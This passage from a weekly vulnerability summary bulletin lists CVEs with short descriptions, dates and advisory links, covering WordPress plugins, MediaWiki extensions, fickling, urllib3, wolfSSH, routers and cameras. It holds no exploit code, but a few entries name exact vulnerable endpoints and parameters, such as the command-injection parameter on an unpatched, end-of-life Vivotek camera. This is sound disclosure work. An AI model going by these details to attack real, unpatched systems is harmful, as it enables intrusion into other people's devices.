| The Wikimedia Foundation--Mediawiki - Wikibase Extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - Wikibase Extension allows Cross-Site Scripting (XSS). This issue affects Mediawiki - Wikibase Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-08 | not yet calculated | CVE-2026-22710 | https://phabricator.wikimedia.org/T409737 https://gerrit.wikimedia.org/r/q/I39d0074b2ad022b6efe6ab3dd8c8ec0f86c6c466 |
| ThemeGoods--Grand Restaurant | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Reflected XSS. This issue affects Grand Restaurant: from n/a through < 7.0.9. | 2026-01-08 | not yet calculated | CVE-2025-67922 | https://vdp.patchstack.com/database/Wordpress/Theme/grandrestaurant/vulnerability/wordpress-grand-restaurant-theme-7-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| THEMELOGI--Navian | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in THEMELOGI Navian navian allows PHP Local File Inclusion. This issue affects Navian: from n/a through <= 1.5.4. | 2026-01-08 | not yet calculated | CVE-2025-14431 | https://vdp.patchstack.com/database/Wordpress/Theme/navian/vulnerability/wordpress-navian-theme-1-5-4-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--AeroLand | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove AeroLand aeroland allows PHP Local File Inclusion. This issue affects AeroLand: from n/a through <= 1.6.6. | 2026-01-08 | not yet calculated | CVE-2025-14429 | https://vdp.patchstack.com/database/Wordpress/Theme/aeroland/vulnerability/wordpress-aeroland-theme-1-6-6-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--Brook - Agency Business Creative | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Brook - Agency Business Creative brook allows PHP Local File Inclusion. This issue affects Brook - Agency Business Creative: from n/a through <= 2.8.9. | 2026-01-08 | not yet calculated | CVE-2025-14430 | https://vdp.patchstack.com/database/Wordpress/Theme/brook/vulnerability/wordpress-brook-agency-business-creative-theme-2-8-9-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--Mitech | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Mitech mitech allows PHP Local File Inclusion. This issue affects Mitech: from n/a through <= 2.3.4. | 2026-01-08 | not yet calculated | CVE-2025-22708 | https://vdp.patchstack.com/database/Wordpress/Theme/mitech/vulnerability/wordpress-mitech-theme-2-3-4-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeMove--Moody | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove Moody tm-moody allows PHP Local File Inclusion. This issue affects Moody: from n/a through <= 2.7.3. | 2026-01-08 | not yet calculated | CVE-2025-22707 | https://vdp.patchstack.com/database/Wordpress/Theme/tm-moody/vulnerability/wordpress-moody-theme-2-7-3-local-file-inclusion-vulnerability?_s_id=cve |
| Themepoints--Accordion | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Accordion accordions-wp allows Stored XSS. This issue affects Accordion: from n/a through <= 3.0.3. | 2026-01-06 | not yet calculated | CVE-2025-69350 | https://vdp.patchstack.com/database/Wordpress/Plugin/accordions-wp/vulnerability/wordpress-accordion-plugin-3-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themepoints--Team Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themepoints Team Showcase team-showcase allows Stored XSS. This issue affects Team Showcase: from n/a through <= 2.9. | 2026-01-06 | not yet calculated | CVE-2025-69335 | https://vdp.patchstack.com/database/Wordpress/Plugin/team-showcase/vulnerability/wordpress-team-showcase-plugin-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| themesuite--Automotive Listings | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themesuite Automotive Listings automotive allows Blind SQL Injection. This issue affects Automotive Listings: from n/a through <= 18.6. | 2026-01-08 | not yet calculated | CVE-2025-67928 | https://vdp.patchstack.com/database/Wordpress/Plugin/automotive/vulnerability/wordpress-automotive-listings-plugin-18-6-sql-injection-vulnerability?_s_id=cve |
| Tickera--Tickera | Missing Authorization vulnerability in Tickera Tickera tickera-event-ticketing-system allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tickera: from n/a through <= 3.5.6.4. | 2026-01-06 | not yet calculated | CVE-2025-69355 | https://vdp.patchstack.com/database/Wordpress/Plugin/tickera-event-ticketing-system/vulnerability/wordpress-tickera-plugin-3-5-6-4-broken-access-control-vulnerability?_s_id=cve |
| TMRW-studio--Atlas | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TMRW-studio Atlas atlas allows PHP Local File Inclusion. This issue affects Atlas: from n/a through <= 2.1.0. | 2026-01-08 | not yet calculated | CVE-2025-22509 | https://vdp.patchstack.com/database/Wordpress/Theme/atlas/vulnerability/wordpress-atlas-theme-2-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| TP-Link Systems Inc.--Archer AXE75 v1.6 | Improper Input Validation vulnerability in TP-Link Archer AXE75 v1.6 (vpn modules) allows an authenticated adjacent attacker to delete arbitrary server files, leading to possible loss of critical system files and service interruption or degraded functionality. This issue affects Archer AXE75 v1.6: ≤ build 20250107. | 2026-01-09 | not yet calculated | CVE-2025-15035 | https://github.com/PaloAltoNetworks/u42-vulnerability-disclosures/tree/master/2025/PANW-2025-0004 https://www.tp-link.com/us/support/download/archer-axe75/v1/#Firmware https://www.tp-link.com/en/support/download/archer-axe75/v1/#Firmware https://www.tp-link.com/jp/support/download/archer-axe75/v1/#Firmware https://www.tp-link.com/phppage/preview.php?url=https://www.tp-link.com/en/support/faq/4881/ |
| TP-Link Systems Inc.--Archer BE400 | A NULL Pointer Dereference vulnerability in TP-Link Archer BE400 V1 (802.11 modules) allows an adjacent attacker to cause a denial-of-service (DoS) by triggering a device reboot. This issue affects Archer BE400: xi 1.1.0 Build 20250710 rel.14914. | 2026-01-07 | not yet calculated | CVE-2025-14631 | https://www.tp-link.com/en/support/download/archer-be400/v1/#Firmware https://www.tp-link.com/us/support/download/archer-be400/#Firmware https://www.tp-link.com/us/support/faq/4871/ |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's runpy module as unsafe. Because of this, a malicious pickle that uses runpy.run_path() or runpy.run_module() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22606 | https://github.com/trailofbits/fickling/security/advisories/GHSA-wfq2-52f7-7qvj https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22607 | https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9 https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, both ctypes and pydoc modules aren't explicitly blocked. Even other existing pickle scanning tools (like picklescan) do not block pydoc.locate. Chaining these two together can achieve RCE while the scanner still reports the file as LIKELY_SAFE. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22608 | https://github.com/trailofbits/fickling/security/advisories/GHSA-5hvc-6wx8-mvv4 https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, the unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22609 | https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91 https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66 https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1 https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9 https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| trailofbits--fickling | Fickling is a Python pickling decompiler and static analyzer. Prior to version 0.1.7, Fickling is vulnerable to detection bypass due to "builtins" blindness. This issue has been patched in version 0.1.7. | 2026-01-10 | not yet calculated | CVE-2026-22612 | https://github.com/trailofbits/fickling/security/advisories/GHSA-h4rm-mm56-xf63 https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf https://github.com/trailofbits/fickling/releases/tag/v0.1.7 |
| Tribulant Software--Newsletters | Deserialization of Untrusted Data vulnerability in Tribulant Software Newsletters newsletters-lite allows Object Injection. This issue affects Newsletters: from n/a through <= 4.11. | 2026-01-08 | not yet calculated | CVE-2025-67911 | https://vdp.patchstack.com/database/Wordpress/Plugin/newsletters-lite/vulnerability/wordpress-newsletters-plugin-4-11-php-object-injection-vulnerability?_s_id=cve |
| TryGhost--Ghost | Ghost is a Node.js content management system. In versions 5.38.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's media inliner mechanism allows staff users in possession of a valid authentication token for the Ghost Admin API to exfiltrate data from internal systems via SSRF. This issue has been patched in versions 5.130.6 and 6.11.0. | 2026-01-10 | not yet calculated | CVE-2026-22597 | https://github.com/TryGhost/Ghost/security/advisories/GHSA-vmc4-9828-r48r https://github.com/TryGhost/Ghost/commit/15d49131ff4aac3aca8642501c793f01f2bfcbb9 https://github.com/TryGhost/Ghost/commit/93add549ccf079d8e28bdb724fbb71a76942ff51 |
| Ubiquiti Inc--airMAX AC | A malicious actor in Wi-Fi range of the affected product could leverage a vulnerability in the airMAX Wireless Protocol to achieve a remote code execution (RCE) within the affected product. Affected Products: airMAX AC (Version 8.7.20 and earlier); airMAX M (Version 6.3.22 and earlier); airFiber AF60-XG (Version 1.2.2 and earlier); airFiber AF60 (Version 2.6.7 and earlier). Mitigation: Update your airMAX AC to Version 8.7.21 or later. Update your airMAX M to Version 6.3.24 or later. Update your airFiber AF60-XG to Version 1.2.3 or later. Update your airFiber AF60 to Version 2.6.8 or later. | 2026-01-08 | not yet calculated | CVE-2026-21639 | https://community.ui.com/releases/Security-Advisory-Bulletin-061-061/1e4fe5f8-29c7-4a7d-a518-01b1537983ba |
| Unknown--FlexTable | The FlexTable WordPress plugin before 3.19.2 does not sanitise and escape the imported links from Google Sheet cells, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2026-01-05 | not yet calculated | CVE-2025-9543 | https://wpscan.com/vulnerability/6cc212f4-aa61-409a-b257-9c920956a401/ |
| Unknown--Frontend File Manager Plugin | The Frontend File Manager Plugin WordPress plugin before 23.5 did not validate a path parameter and ownership of the file, allowing any authenticated user, such as a subscriber, to delete arbitrary files on the server. | 2026-01-07 | not yet calculated | CVE-2025-14804 | https://wpscan.com/vulnerability/c572c0ad-1b36-49ce-b254-2181e53abb46/ |
| Unknown--NEX-Forms | The NEX-Forms WordPress plugin before 9.1.8 does not sanitise and escape some of its settings. The NEX-Forms WordPress plugin before 9.1.8 can be configured in such a way that could allow subscribers to perform Stored Cross-Site Scripting. | 2026-01-09 | not yet calculated | CVE-2025-14803 | https://wpscan.com/vulnerability/219af0e7-3d8b-4405-8005-b8969a370b0b/ |
| Unknown--Relevanssi | The Relevanssi WordPress plugin before 4.26.0 and the Relevanssi Premium WordPress plugin before 2.29.0 do not sanitize and escape a parameter before using it in a SQL statement, allowing contributor and above roles to perform SQL injection attacks. | 2026-01-07 | not yet calculated | CVE-2025-14719 | https://wpscan.com/vulnerability/bd8e27c7-8f97-4313-b16e-50ac6f0676f5/ |
| Unknown--Team | The Team WordPress plugin before 5.0.11 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. | 2026-01-05 | not yet calculated | CVE-2025-14124 | https://wpscan.com/vulnerability/fdd19027-b70e-45a4-882b-77ab1819af91/ |
| urllib3--urllib3 | urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` and do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted sources. | 2026-01-07 | not yet calculated | CVE-2026-21441 | https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99 https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b |
| vaadin--vaadin | Action captions in Vaadin accept HTML by default but were not sanitized, potentially allowing Cross-site Scripting (XSS) if caption content is derived from user input. In Vaadin Framework 7 and 8, the Action class is a general-purpose class that may be used by multiple components. The fixed versions sanitize captions by default and provide an API to explicitly enable HTML content mode for backwards compatibility. In Vaadin 23 and newer, the Action class is only used by the Spreadsheet component. The fixed versions sanitize HTML using Jsoup with a relaxed safelist. Vaadin 14 is not affected as the Spreadsheet component was not supported. Users of affected versions should apply the following mitigation or upgrade. Affected product versions: Vaadin 7.0.0 - 7.7.49; Vaadin 8.0.0 - 8.29.1; Vaadin 23.1.0 - 23.6.5; Vaadin 24.0.0 - 24.8.13; Vaadin 24.9.0 - 24.9.6. Mitigation: upgrade to 7.7.50; upgrade to 8.30.0; upgrade to 23.6.6; upgrade to 24.8.14 or 24.9.7; upgrade to 25.0.0 or newer. Artifacts (Maven coordinates, vulnerable versions, fixed version): com.vaadin:vaadin-server 7.0.0 - 7.7.49, ≥7.7.50; com.vaadin:vaadin-server 8.0.0 - 8.29.1, ≥8.30.0; com.vaadin:vaadin 23.1.0 - 23.6.5, ≥23.6.6; com.vaadin:vaadin 24.0.0 - 24.8.13, ≥24.8.14; com.vaadin:vaadin 24.9.0 - 24.9.6, ≥24.9.7; com.vaadin:vaadin-spreadsheet-flow 23.1.0 - 23.6.5, ≥23.6.6; com.vaadin:vaadin-spreadsheet-flow 24.0.0 - 24.8.13, ≥24.8.14; com.vaadin:vaadin-spreadsheet-flow 24.9.0 - 24.9.6, ≥24.9.7. | 2026-01-05 | not yet calculated | CVE-2025-15022 | https://vaadin.com/security/cve-2025-15022 https://github.com/vaadin/flow-components/pull/8285 |
| VanKarWai--Calafate | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in VanKarWai Calafate calafate allows PHP Local File Inclusion. This issue affects Calafate: from n/a through <= 1.7.7. | 2026-01-06 | not yet calculated | CVE-2025-69342 | https://vdp.patchstack.com/database/Wordpress/Theme/calafate/vulnerability/wordpress-calafate-theme-1-7-7-local-file-inclusion-vulnerability?_s_id=cve |
| VanKarWai--Lobo | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VanKarWai Lobo lobo allows Blind SQL Injection. This issue affects Lobo: from n/a through < 2.8.6. | 2026-01-08 | not yet calculated | CVE-2025-67921 | https://vdp.patchstack.com/database/Wordpress/Theme/lobo/vulnerability/wordpress-lobo-theme-2-8-6-sql-injection-vulnerability?_s_id=cve |
| vanquish--WooCommerce Orders & Customers Exporter | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in vanquish WooCommerce Orders & Customers Exporter woocommerce-orders-ei allows SQL Injection. This issue affects WooCommerce Orders & Customers Exporter: from n/a through <= 5.4. | 2026-01-08 | not yet calculated | CVE-2025-22713 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-orders-ei/vulnerability/wordpress-woocommerce-orders-customers-exporter-plugin-5-4-sql-injection-vulnerability?_s_id=cve |
| Vernon Systems Limited--eHive Search | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vernon Systems Limited eHive Search ehive-search allows Reflected XSS. This issue affects eHive Search: from n/a through <= 2.5.0. | 2026-01-08 | not yet calculated | CVE-2025-67930 | https://vdp.patchstack.com/database/Wordpress/Plugin/ehive-search/vulnerability/wordpress-ehive-search-plugin-2-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a is vulnerable to an information disclosure issue where live camera footage can be accessed through the RTSP protocol on port 8554 without requiring authentication. This allows unauthorized users with network access to view the camera's feed, potentially compromising user privacy and security. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has reached its End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66049 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a by default does not require a password when logging in as an administrator. While it is possible to set up such a password, the user is not informed of the need to do so. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has reached its End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66050 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a is vulnerable to path traversal. It is possible for an authenticated attacker to access resources beyond the webroot directory using a direct HTTP request. Due to CVE-2025-66050, a password for the administration panel is not set by default. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has reached its End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66051 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Vivotek--IP7137 | Vivotek IP7137 camera with firmware version 0200a is vulnerable to command injection. The parameter "system_ntpIt" used by the "/cgi-bin/admin/setparam.cgi" endpoint is not sanitized properly, allowing a user with administrative privileges to perform an attack. Due to CVE-2025-66050, administrative access is not protected by default. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has reached its End-Of-Life phase, a fix is not expected to be released. | 2026-01-09 | not yet calculated | CVE-2025-66052 | https://cert.pl/posts/2026/01/CVE-2025-66049 |
| Wikimedia Foundation--MediaWiki - CampaignEvents extension | Missing Authorization vulnerability in Wikimedia Foundation MediaWiki - CampaignEvents extension allows Privilege Abuse. This issue affects MediaWiki - CampaignEvents extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-09 | not yet calculated | CVE-2026-0817 | https://phabricator.wikimedia.org/T410560 https://gerrit.wikimedia.org/r/q/I7ed0049691258c8bd2555e599b9b88490fbe3358 |
| Wikimedia Foundation--MediaWiki - CSS extension | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Wikimedia Foundation MediaWiki - CSS extension allows Path Traversal. This issue affects MediaWiki - CSS extension: 1.44, 1.43, 1.39. | 2026-01-07 | not yet calculated | CVE-2026-0669 | https://phabricator.wikimedia.org/T401526 https://gerrit.wikimedia.org/r/q/Ia15bf3f2e5a341868568492a736ac3dbf706c22e |
| Wikimedia Foundation--MediaWiki - ProofreadPage Extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki - ProofreadPage Extension allows Cross-Site Scripting (XSS). This issue affects MediaWiki - ProofreadPage Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-07 | not yet calculated | CVE-2026-0670 | https://phabricator.wikimedia.org/T409423 https://gerrit.wikimedia.org/r/q/I7c028db5ed81843aacd596b0ee4dc2980f5b6e3c |
| Wikimedia Foundation--MediaWiki - UploadWizard extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki - UploadWizard extension allows Cross-Site Scripting (XSS). This issue affects MediaWiki - UploadWizard extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-08 | not yet calculated | CVE-2026-0671 | https://phabricator.wikimedia.org/T407157 https://gerrit.wikimedia.org/r/q/I16de2211594ea9a686868ad7789f9879bf981fa1 |
| Wikimedia Foundation--MediaWiki - VisualData Extension | Inefficient Regular Expression Complexity vulnerability in Wikimedia Foundation MediaWiki - VisualData Extension allows Regular Expression Exponential Blowup. This issue affects MediaWiki - VisualData Extension: 1.45. | 2026-01-07 | not yet calculated | CVE-2026-0668 | https://phabricator.wikimedia.org/T387008 https://gerrit.wikimedia.org/r/q/Ie08d9a8ceb2c9a22a635cfc27964353f14072dbf https://gerrit.wikimedia.org/r/q/Ifbf9c2ade621226e14fe852f3217293772bf8bb8 https://gerrit.wikimedia.org/r/q/I893a9fca694a2613e29e149dea2d76d7f06063e5 https://gerrit.wikimedia.org/r/q/I4ff2737c9f0ba805267d1fc8296e7cff61241ee3 |
| WofficeIO--Woffice | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WofficeIO Woffice woffice allows Reflected XSS. This issue affects Woffice: from n/a through <= 5.4.30. | 2026-01-08 | not yet calculated | CVE-2025-67918 | https://vdp.patchstack.com/database/Wordpress/Theme/woffice/vulnerability/wordpress-woffice-theme-5-4-30-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WofficeIO--Woffice Core | Authorization Bypass Through User-Controlled Key vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Woffice Core: from n/a through <= 5.4.30. | 2026-01-08 | not yet calculated | CVE-2025-67919 | https://vdp.patchstack.com/database/Wordpress/Plugin/woffice-core/vulnerability/wordpress-woffice-core-plugin-5-4-30-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| wolfSSL--wolfSSH | wolfSSH's key exchange state machine can be manipulated to leak the client's password in the clear, trick the client to send a bogus signature, or trick the client into skipping user authentication. This affects client applications with wolfSSH version 1.4.21 and earlier. Users of wolfSSH must update or apply the fix patch and it's recommended to update credentials used. This fix is also recommended for wolfSSH server applications. While there aren't any specific attacks on server applications, the same defect is present. Thanks to Aina Toky Rasoamanana of Valeo and Olivier Levillain of Telecom SudParis for the report. | 2026-01-06 | not yet calculated | CVE-2025-14942 | https://github.com/wolfSSL/wolfssh/pull/855 |
| wolfSSL--wolfSSH | A heap buffer over-read vulnerability exists in the wolfSSH_CleanPath() function in wolfSSH. An authenticated remote attacker can trigger the issue via crafted SCP path input containing '/./' sequences, resulting in a heap over read by 1 byte. | 2026-01-06 | not yet calculated | CVE-2025-15382 | https://github.com/wolfSSL/wolfssh/pull/859 |
| wolfSSL--wolfSSL-py | A vulnerability in the handling of verify_mode = CERT_REQUIRED in the wolfssl Python package (wolfssl-py) causes client certificate requirements to not be fully enforced. Because the WOLFSSL_VERIFY_FAIL_IF_NO_PEER_CERT flag was not included, the behavior effectively matched CERT_OPTIONAL: a peer certificate was verified if presented, but connections were incorrectly authenticated when no client certificate was provided. This results in improper authentication, allowing attackers to bypass mutual TLS (mTLS) client authentication by omitting a client certificate during the TLS handshake. The issue affects versions up to and including 5.8.2. | 2026-01-07 | not yet calculated | CVE-2025-15346 | https://github.com/wolfSSL/wolfssl-py/pull/62 https://github.com/wolfSSL/wolfssl-py/commit/b4517dece79f682a8f453abce5cfc0b81bae769d https://github.com/wolfSSL/wolfssl-py/releases/tag/v5.8.4-stable |
| WPCenter--AffiliateX | Missing Authorization vulnerability in WPCenter AffiliateX affiliatex allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AffiliateX: from n/a through <= 1.3.9.3. | 2026-01-06 | not yet calculated | CVE-2025-69346 | https://vdp.patchstack.com/database/Wordpress/Plugin/affiliatex/vulnerability/wordpress-affiliatex-plugin-1-3-9-3-broken-access-control-vulnerability?_s_id=cve |
| WPFactory--Wishlist for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Wishlist for WooCommerce wish-list-for-woocommerce allows Stored XSS. This issue affects Wishlist for WooCommerce: from n/a through <= 3.3.0. | 2026-01-06 | not yet calculated | CVE-2025-69334 | https://vdp.patchstack.com/database/Wordpress/Plugin/wish-list-for-woocommerce/vulnerability/wordpress-wishlist-for-woocommerce-plugin-3-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WPFunnels--Creator LMS | Missing Authorization vulnerability in WPFunnels Creator LMS creatorlms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Creator LMS: from n/a through <= 1.1.12. | 2026-01-06 | not yet calculated | CVE-2025-69359 | https://vdp.patchstack.com/database/Wordpress/Plugin/creatorlms/vulnerability/wordpress-creator-lms-plugin-1-1-12-broken-access-control-vulnerability?_s_id=cve |
| yintibao--Fun Print Mobile | Exported Activity allows external applications to gain application context and directly launch Gmail with inbox access, bypassing security controls. | 2026-01-08 | not yet calculated | CVE-2025-15464 | https://korelogic.com/Resources/Advisories/KL-001-2026-001.txt |
| zlib software--zlib | zlib versions up to and including 1.3.1.2 contain a global buffer overflow in the untgz utility. The TGZfname() function copies an attacker-supplied archive name from argv[] into a fixed-size 1024-byte static global buffer using an unbounded strcpy() call without length validation. Supplying an archive name longer than 1024 bytes results in an out-of-bounds write that can lead to memory corruption, denial of service, and potentially code execution depending on compiler, build flags, architecture, and memory layout. The overflow occurs prior to any archive parsing or validation. | 2026-01-07 | not yet calculated | CVE-2026-22184 | https://seclists.org/fulldisclosure/2026/Jan/3 https://zlib.net/ https://github.com/madler/zlib https://www.vulncheck.com/advisories/zlib-untgz-global-buffer-overflow-in-tgzfname |
| zozothemes--Corpkit | Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Corpkit corpkit allows Upload a Web Shell to a Web Server. This issue affects Corpkit: from n/a through <= 2.0. | 2026-01-08 | not yet calculated | CVE-2025-67924 | https://vdp.patchstack.com/database/Wordpress/Theme/corpkit/vulnerability/wordpress-corpkit-theme-2-0-arbitrary-file-upload-vulnerability?_s_id=cve |
| zozothemes--Corpkit | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Corpkit corpkit allows PHP Local File Inclusion. This issue affects Corpkit: from n/a through <= 2.0. | 2026-01-08 | not yet calculated | CVE-2025-67925 | https://vdp.patchstack.com/database/Wordpress/Theme/corpkit/vulnerability/wordpress-corpkit-theme-2-0-local-file-inclusion-vulnerability?_s_id=cve |
Vulnerability Summary for the Week of December 29, 2025
Posted on Monday January 05, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| SmarterTools--SmarterMail | Successful exploitation of the vulnerability could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution. | 2025-12-29 | 10 | CVE-2025-52691 | https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-124/ |
| MiniDVBLinux--MiniDVBLinux | MiniDVBLinux 5.4 contains a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary commands as root through the 'command' GET parameter. Attackers can exploit the /tpl/commands.sh endpoint by sending malicious command values to gain root-level system access. | 2025-12-30 | 9.8 | CVE-2022-50691 | Zero Science Lab Disclosure (ZSL-2022-5718) Packet Storm Security Exploit Entry VulnCheck Advisory: MiniDVBLinux 5.4 Remote Root Command Execution via commands.sh |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x contains a network vulnerability that allows unauthenticated attackers to send ICMP signals to arbitrary hosts through network command scripts. Attackers can abuse ping.php, traceroute.php, and dns.php to generate network flooding attacks targeting external hosts. | 2025-12-30 | 9.8 | CVE-2022-50695 | Zero Science Lab Disclosure (ZSL-2022-5728) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x ICMP Flood Attack via Network Commands |
